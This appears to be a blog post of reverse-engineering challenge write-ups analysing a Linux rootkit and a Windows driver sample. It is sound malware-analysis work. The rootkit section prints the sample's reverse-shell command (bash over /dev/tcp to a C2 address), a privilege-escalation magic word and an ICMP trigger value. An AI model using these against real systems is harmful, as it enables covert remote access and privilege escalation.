The publication date of this post reflects the initial version; I will probably split this up in the future.
The malops platform is a collection of reverse engineering challenges targeting realistic malware scenarios. By providing a sample and a series of analysis questions, players are challenged to dive into real-world malware samples.
That’s exactly the right formula to get me hooked. To structure my progress while I make my way through the challenges and satisfy my inner completionist, I will be collecting write-ups below.
So far, the page below contains the following challenges (in order of completion):
This is a challenge in the rootkit category. We’re supplied with a file called singularity.ko, a Linux kernel module. The challenge suggests using IDA Pro, which means I’ll be using Binary Ninja.
“What is the SHA256 hash of the sample?”
We simply call sha256sum. The hash is 0b8ecdaccf492000f3143fa209481eb9db8c0a29da2b79ff5b7f6e84bb3ac7c8
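If sha256sum is not at hand, the same digest can be computed with Python's hashlib. This is a minimal sketch; the helper name sha256_of_file and the chunk size are my own choices.

```python
import hashlib

def sha256_of_file(path, chunk_size=65536):
    """Return the hex SHA-256 digest of the file at `path`, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        # iter() with a sentinel keeps reading until read() returns b""
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

Calling sha256_of_file("singularity.ko") should yield the same hex string that sha256sum prints.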
“What is the name of the primary initialization function called when the module is loaded?”
Historically, the standard way was to implement init_module. More recent kernels define the module_init macro, which wraps a driver’s custom initialization function and defines it as an alias of init_module. The compiler appears to have flattened it back down to init_module.
“How many distinct feature-initialization functions are called within above mentioned function?”
The function looks as follows:
004052b0 int64_t init_module()
004052b0 endbr64
004052b4 call __fentry__
004052b9 push rbx {__saved_rbx}
004052ba call reset_tainted_init
004052bf mov ebx, eax
004052c1 call hiding_open_init
004052c6 or ebx, eax
004052c8 call become_root_init
004052cd or ebx, eax
004052cf call hiding_directory_init
004052d4 or ebx, eax
004052d6 call hiding_stat_init
004052db or ebx, eax
004052dd call hiding_tcp_init
004052e2 or ebx, eax
004052e4 call hooking_insmod_init
004052e9 or ebx, eax
004052eb call clear_taint_dmesg_init
004052f0 or ebx, eax
004052f2 call hooks_write_init
004052f7 or ebx, eax
004052f9 call hiding_chdir_init
004052fe or ebx, eax
00405300 call hiding_readlink_init
00405305 or ebx, eax
00405307 call bpf_hook_init
0040530c or ebx, eax
0040530e call hiding_icmp_init
00405313 or ebx, eax
00405315 call trace_pid_init
0040531a or ebx, eax
0040531c call module_hide_current
00405321 mov eax, ebx
00405323 pop rbx {__saved_rbx}
00405324 jmp __x86_return_thunk
We simply count the call instructions, excluding the call to __fentry__: fourteen *_init functions plus module_hide_current, so there are fifteen initialization functions.
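The count is easy to double-check by script. The sketch below assumes the call lines of the listing above have been pasted into a string; called_functions is a hypothetical helper, not part of any tool.

```python
import re

def called_functions(listing, ignore=("__fentry__",)):
    """Return call targets in order of appearance, skipping ignored names."""
    targets = re.findall(r"\bcall\s+(\w+)", listing)
    return [name for name in targets if name not in ignore]

# Call lines copied from the init_module listing
listing = """
004052b4 call __fentry__
004052ba call reset_tainted_init
004052c1 call hiding_open_init
004052c8 call become_root_init
004052cf call hiding_directory_init
004052d6 call hiding_stat_init
004052dd call hiding_tcp_init
004052e4 call hooking_insmod_init
004052eb call clear_taint_dmesg_init
004052f2 call hooks_write_init
004052f9 call hiding_chdir_init
00405300 call hiding_readlink_init
00405307 call bpf_hook_init
0040530e call hiding_icmp_init
00405315 call trace_pid_init
0040531c call module_hide_current
"""

calls = called_functions(listing)
print(len(calls), calls[-1])  # 15 module_hide_current
```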
“The reset_tainted_init function creates a kernel thread for anti-forensics. What is the hardcoded name of this thread?”
The reset_tainted_init function contains the following snippet:
004000aa void* rax_2 = kthread_create_on_node(
004000aa singularity_exit, 0, 0xffffffff,
004000aa "zer0t")
The fourth argument of kthread_create_on_node is the format string for the thread’s name, so the answer is zer0t.
“The add_hidden_pid function has a hardcoded limit. What is the maximum number of PIDs the rootkit can hide?”
The following conditional in add_hidden_pid tells us when the loop breaks:
004027bc else if (hidden_count_1 != 0x20)
004027ca break
The limit is 0x20, which is 32 in decimal.
“What is the name of the function called last within init_module to hide the rootkit itself?”
Refer to the listing in question 3; it’s module_hide_current.
“The TCP port hiding module is initialized. What is the hardcoded port number it is configured to hide (decimal)?”
We look at functions related to TCP for this. hiding_tcp_init installs a number of hooks, one of which is hooked_tcp4_seq_show. The latter contains the following conditional. For clarity, we set the type of v to struct sock*.
00400d7b if (v->__offset(0x318).d
00400d7b != in_aton("192.168.5.128")
00400d7b && v->__sk_common..skc_addrpair.d
00400d7b != in_aton("192.168.5.128")
00400d7b && v->__offset(0x31e).w != 0xa146
00400d7b && v->__sk_common..skc_portpair.w
00400d7b != 0xa146)
The port number appears as 0xa146, but the port fields of a socket are stored in network byte order (big-endian), whereas the decompiler displays the comparison as a little-endian word. To compute the decimal value, we must thus swap the bytes. We get 0x46a1, which is 18081.
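The byte swap is quick to verify in Python. A minimal sketch; swap16 is a helper name I made up for illustration.

```python
def swap16(value):
    """Swap the two bytes of a 16-bit value."""
    return int.from_bytes(value.to_bytes(2, "little"), "big")

port = swap16(0xA146)
print(hex(port), port)  # 0x46a1 18081
```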
“What is the hardcoded “magic word” string, checked for by the privilege escalation module?”
The “privilege escalation module” appears to refer to become_root_init. This function installs a series of hooks starting from 0x0040aa10. Turning the data at that address into an array of ftrace_hook objects helps with readability somewhat.
We page through the installed hooks, and in hook_getuid we observe the following:
004002e2 if (strstr(i_1, "MAGIC=babyelephant") != 0)
004002e4 int64_t rax_5 = prepare_creds()
It appears the magic word is babyelephant.
“How many hooks, in total, does the become_root_init function install to enable privilege escalation?”
We see a single call to fh_install_hooks. The second argument is the number of hooks: 0xa, or decimal 10.
“What is the hardcoded IPv4 address of the C2 server?”
See the snippet for question 7; 192.168.5.128. This IP also occurs in functions such as hooked_tpacket_rcv where the network traffic is hidden, and in hook_icmp_rcv and spawn_revshell where the actual connection is established.
“What is the hardcoded port number the C2 server listens on?”
The C2 server listens for the reverse shell connection initiated by spawn_revshell; this function builds the following command string:
004048eb snprintf(&cmd, 0x300,
004048eb "bash -c 'PID=$$; kill -59 $PID; exec -a \"%s\" "
004048eb "/bin/bash &>/dev/tcp/%s/%s 0>&1' &",
004048eb "firefox-updater", "192.168.5.128", "443")
It establishes a TCP connection to 192.168.5.128 on port 443.
“What network protocol is hooked to listen for the backdoor trigger?”
That’s what’s happening in hook_icmp_rcv; the protocol we’re looking for is ICMP.
“What is the “magic” sequence number that triggers the reverse shell (decimal)?”
I’ve not dissected the packet structure in detail, but the following comparison seems to give it away:
00404ae5 if (head != neg.q(rax_6) &&
00404ae5 in4_pton("192.168.5.128", 0xffffffff, &trigger_ip, 0xffffffff, 0) != 0
00404ae5 && *(rax_3 + 0xc) == trigger_ip && *rdx_3 == 8
00404ae5 && *(rdx_3 + 6) == 0xcf07)
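The magic number is 0xcf07. That fits the ICMP echo header layout: the byte at offset 0 is the type (8 is an echo request) and the 16-bit field at offset 6 is the sequence number, stored in network byte order. Again we swap the bytes of the little-endian read, converting to 0x07cf, which is 1999 in decimal.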
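To sanity-check the reading of that comparison, the sketch below unpacks an ICMP echo header with the struct module. The packet is hypothetical: I build it myself with an arbitrary identifier (0x1234) and a zero checksum, purely to show how sequence number 1999 looks when read as a little-endian word.

```python
import struct

def parse_icmp_echo(header):
    """Unpack the 8-byte ICMP echo header; fields are in network byte order."""
    icmp_type, code, checksum, identifier, sequence = struct.unpack(
        "!BBHHH", header[:8]
    )
    return {
        "type": icmp_type,
        "code": code,
        "checksum": checksum,
        "id": identifier,
        "sequence": sequence,
    }

# Hypothetical echo request (type 8) carrying sequence number 1999
packet = struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1999)
fields = parse_icmp_echo(packet)

# What an x86 word read at offset 6 sees, as in the decompiled comparison
raw_le = struct.unpack_from("<H", packet, 6)[0]
print(fields["type"], fields["sequence"], hex(raw_le))  # 8 1999 0xcf07
```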
“When the trigger conditions are met, what is the name of the function queued to execute the reverse shell?”
Right below the condition from question 13, we find:
00404b3f if (rax_9 != 0)
00404b4f rax_9[3] = spawn_revshell
00404b5c int64_t rsi_2 = *system_wq
00404b63 *rax_9 = 0xfffffffe00000
00404b6a rax_9[1] = &rax_9[1]
00404b6e rax_9[2] = &rax_9[1]
00404b72 queue_work_on(0x2000, rsi_2)
The function is clearly named: spawn_revshell.
“The spawn_revshell function launches a process. What is the hardcoded process name it uses for the reverse shell?”
We refer to the command in question 11; the process name is supplied using the -a flag of the exec command: firefox-updater.
Continuing in the rootkit category, we’re given a single sample file. As we’ll see shortly, this is a Windows driver.
“What is the SHA256 of this sample?”
Running sha256sum gives us 980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43
“What type of executable is this sample?”
This one had me stumped for a while. The answer format suggests we’re looking for six characters, so PE32 or PE is out. I tried native, but that was wrong.
After asking on the Malops Discord to verify whether the answer format was correct, I was told to look at the IMAGE_OPTIONAL_HEADER. Searching for a six-character word led me to the DllCharacteristics flags, one of which is WDM_DRIVER. This indicates that the file is a Windows driver that uses the Windows Driver Model.
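For those who prefer a script over a GUI, the flag can be read straight from the headers. This is a rough sketch using only the standard library; the function names are mine, and it assumes a well-formed PE image passed in as bytes.

```python
import struct

IMAGE_DLLCHARACTERISTICS_WDM_DRIVER = 0x2000

def dll_characteristics(image):
    """Return the DllCharacteristics field of a PE image given as bytes."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe_offset = struct.unpack_from("<I", image, 0x3C)[0]  # e_lfanew
    if image[pe_offset:pe_offset + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # Skip the 4-byte signature and the 20-byte COFF file header
    optional_header = pe_offset + 4 + 20
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+
    return struct.unpack_from("<H", image, optional_header + 70)[0]

def is_wdm_driver(image):
    """True if the WDM_DRIVER bit is set in DllCharacteristics."""
    flags = dll_characteristics(image)
    return bool(flags & IMAGE_DLLCHARACTERISTICS_WDM_DRIVER)
```

Usage would be along the lines of is_wdm_driver(open(path, "rb").read()), where path points at the sample.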
“This sample attempts to masquerade as a component of the system. Which system component is it attempting to masquerade as?”
The FileDescription field of the Version resource tells us that the file is the Windows NT SMB Manager. We can browse the file resources using tools such as Detect-It-Easy.
“What is the Original Filename of the sample?”
The OriginalFilename field is also part of a PE file’s Version resource. The original filename of this sample is mrxsmbmg.sys.
“This sample only runs on one type of system architecture, which one?”
This is a 32-bit driver and Windows provides no compatibility layer for drivers, so this sample only runs on 32-bit systems.
“This is targeted at specific versions of the Windows operating system. Which version of Windows will this sample not run on?”
In _start, we find the following snippet that retrieves and checks the system version:
00010d29 PsGetVersion(&var_8, &var_c, 0, 0)
00010d29 ...
00010d33 if (var_8 u<= 5)
The MajorVersion is written to var_8; the _start function only continues if it’s 5 or less. That’s remarkable, as the IMAGE_OPTIONAL_HEADER specifies a MajorOperatingSystemVersion requirement of 6.
“What Windows API does the sample use to execute the main function via Thread?”
Once the OS check has passed and a memory pool has been allocated, the _start function builds a thread context and calls PsCreateSystemThread at address 00010dd7. Notably, it passes a pointer to sub_10afc as the StartRoutine argument.
“With the goal of obfuscating certain capabilities, the sample implements an algorithm for decrypting strings at runtime. What is the seed of this algorithm?”
In sub_10afc we find a couple of references to sub_11524; the first argument is a constant, and the second is a reference to an address in the .data section. Looking at the chunks of data at those addresses, we identify several sequences of data separated by null bytes. Indeed, when we check the cross references to the start of these sequences, we find more references to sub_11524. Presumably this is the string deobfuscation routine.
The stack variables in sub_10afc are not identified correctly, as Binary Ninja does not seem to recognize sub_12860 and sub_1289b as SEH prolog/epilog. The binary was compiled using Visual Studio 2005, whose output differs slightly from that of modern compilers. Binary Ninja currently does not implement this, but manually marking the functions as ‘inline’ serves as a workaround.
Inside sub_11524, we find some buffer manipulation and a reference to sub_11432. This is where the magic happens:
00011456 if (result s> 0)
00011475 do
0001145e state = state * 0x19660d + 0x3c6ef35f
0001146e buffer[ecx_1] ^= (state u>> 0x10).w | 0x8000
00011472 ecx_1 += 1
00011475 while (ecx_1 s< result)
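That’s an LCG! The multiplier 0x19660d (1664525) and increment 0x3c6ef35f (1013904223) are the well-known Numerical Recipes constants. Tracing the function arguments, we see that the first argument of sub_11524 is passed to sub_11432 as its first argument as well. This is the LCG seed: 0xaa107fb.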
Interestingly, there are two instances of data deobfuscation going on. The function described above operates on words, while the LCG at sub_11432 operates on bytes. Indeed, the encrypted strings from 0x12f20 onwards are separated by single null bytes rather than null words.
“What are the first three strings (in order) that were decrypted?”
Alas, a question where dynamic analysis is probably much more convenient. That requires firing up a Windows VM, though. We can use the Binary Ninja API and a bit of Python, instead:
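# bv is the BinaryView exposed by Binary Ninja's Python console
def decrypt_string(addr):
    # Decrypt a string of 16-bit words at addr, terminated by a null word
    state = 0xAA107FB  # LCG seed passed to sub_11524
    output = ""
    while True:
        data = int.from_bytes(bv.read(addr, 2), byteorder="little")
        addr += 2
        if data == 0:
            break
        state = (state * 0x19660D + 0x3C6EF35F) & 0xFFFFFFFF
        # Keystream word: upper 16 bits of the state with the top bit forced on
        output += chr(data ^ ((state >> 0x10) | 0x8000))
    return output

print(decrypt_string(0x12eb0))
print(decrypt_string(0x12e9c))
print(decrypt_string(0x12ecc))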
The fact that it operates on words tripped me up when implementing the above, and I ended up using unicorn with udbserver and gdbgui to trace what was going on. At that point the debugger showed the strings, but I was already too far down the static analysis rabbit hole to accept defeat.
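For anyone who wants to poke at the word-based routine without Binary Ninja, here is a standalone sketch that works on a plain bytes object. The function name lcg_xor_words is my own, and like the script above it stops at the first null word rather than taking a length. Since XOR is its own inverse, the same function both encrypts and decrypts, which makes a round trip an easy self-check.

```python
def lcg_xor_words(data, seed=0xAA107FB):
    """XOR each little-endian 16-bit word of `data` with the LCG keystream.

    Processing stops at the first zero word. Applying the function twice
    with the same seed returns the original input.
    """
    state = seed
    out = bytearray()
    for offset in range(0, len(data) - 1, 2):
        word = int.from_bytes(data[offset:offset + 2], "little")
        if word == 0:
            break
        state = (state * 0x19660D + 0x3C6EF35F) & 0xFFFFFFFF
        # Upper 16 bits of the state, with the top bit forced on
        key = ((state >> 16) | 0x8000) & 0xFFFF
        out += (word ^ key).to_bytes(2, "little")
    return bytes(out)

# Round trip on a test string encoded as UTF-16LE
plain = "lsass.exe".encode("utf-16-le")
cipher = lcg_xor_words(plain)
print(lcg_xor_words(cipher).decode("utf-16-le"))  # lsass.exe
```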
We can use the Binary Ninja API as follows to quickly rename the strings accordingly; the first three strings are services.exe, lsass.exe and winlogon.exe.
bv.define_user_data_var(here, bv.get_data_var_at(here).type,
decrypt_string_8(here))
Purely out of curiosity, the other strings in the .data section encrypted using the 2-byte LCG are msvcp73.dll and Kernel32.dll. The single-byte LCG was used to encrypt the names of memory allocation and thread related API calls: VirtualFree, LoadLibraryW, KeAttachProcess, KeDetachProcess, ZwAllocateVirtualMemory, ZwFreeVirtualMemory, KeInitializeApc, and KeInsertQueueApc.